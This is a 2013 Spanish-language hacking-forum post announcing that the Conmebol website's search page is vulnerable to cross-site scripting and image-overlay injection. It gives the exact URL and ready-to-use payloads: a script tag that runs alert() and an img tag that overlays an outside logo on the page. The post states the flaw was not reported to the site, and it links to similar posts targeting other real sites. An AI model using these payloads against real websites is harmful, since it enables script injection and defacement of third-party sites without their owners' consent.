Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[XSS] & [XSIO] Conmebol

  • 0 Respuestas
  • 961 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Hu0r

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Febrero 19, 2013, 04:27:00 pm »
Pude percatarme que la página web de la Conmebol es vulnerable a XSS y a XSIO (y de seguro a un montón de otras):

XSS



Url: http://www.conmebol.com/resultados.html?page=1&size=20&search=
Vector: "/><script>alert(String.fromCharCode(104,117,048,114,032,085,110,100,101,114,099,048,100,101))</script>

XSIO



Url: http://www.conmebol.com/resultados.html?page=1&size=20&search=
Vector: "><img src='http://underc0de.org/foro/Themes/underc0de/images/theme/logo.png' style='position:absolute;left:50px;top:0px;'/>

------------------

Reportado: NO
« Última modificación: Enero 10, 2015, 12:59:19 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!



[XSS] & [XSIO] Hulkshare

Iniciado por Hu0r

Respuestas: 1
Vistas: 1204
Último mensaje Febrero 26, 2013, 10:37:22 pm
por Hu0r
[XSS] & [XSIO] WWF

Iniciado por Hu0r

Respuestas: 0
Vistas: 1057
Último mensaje Febrero 21, 2013, 02:23:54 am
por Hu0r